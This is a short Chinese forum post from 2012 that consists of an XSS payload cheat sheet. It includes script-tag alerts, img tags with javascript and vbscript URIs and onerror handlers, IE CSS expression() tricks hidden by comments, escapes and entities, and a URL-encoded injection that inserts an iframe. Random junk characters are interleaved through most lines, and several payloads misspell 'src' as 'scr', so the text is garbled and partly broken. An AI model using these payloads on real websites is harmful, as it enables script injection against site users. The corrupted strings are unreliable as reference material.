<script>alert("跨站")</script> (最常用)9 P4 N: {) j- B7 t+ p/ z
<img scr=javascript:alert("跨站")></img>: r: C+ ^4 A6 B W
<img scr="javascript: alert(/跨站/)></img>
! }: T. A7 U X' s- C5 D<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
4 d6 Q2 T$ d3 Q$ K! g3 s! G<img scr="#" onerror=alert(/跨站/)></img>+ v6 `4 D! q0 v. V0 k
<img scr="#" style="xss:expression(alert(/xss/));"></img>
% L$ h3 m% N P% R& U<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)% y' M& N. ~& O, {* m
<img src=vbscript:msgbox ("xss")></img>% i$ }1 d( I" C* m7 A: r
<style> input {left:expression (alert('xss'))}</style>% I, H A: H. x$ }, u! H- X8 R
<div style={left:expression (alert('xss'))}></div>9 ^# X. b/ c7 P* w$ U1 N$ w
<div style={left:exp/* */ression (alert('xss'))}></div>
% M: U3 U! s' h# V& N$ Y<div style={left:\0065\0078ression (alert('xss'))}></div>/ L" U3 ~3 y, E9 V: i# p
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
* p8 ]+ E6 E) P. X1 @6 junicode <div style="{left:expRessioN (alert('xss'))}">
( A8 I. r) \9 A) Q& F( }1 f4 q6 X' l
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["3 N3 _3 i2 C' X! W) Z
|
发表于 2012-9-15 14:09:13
收藏
支持
反对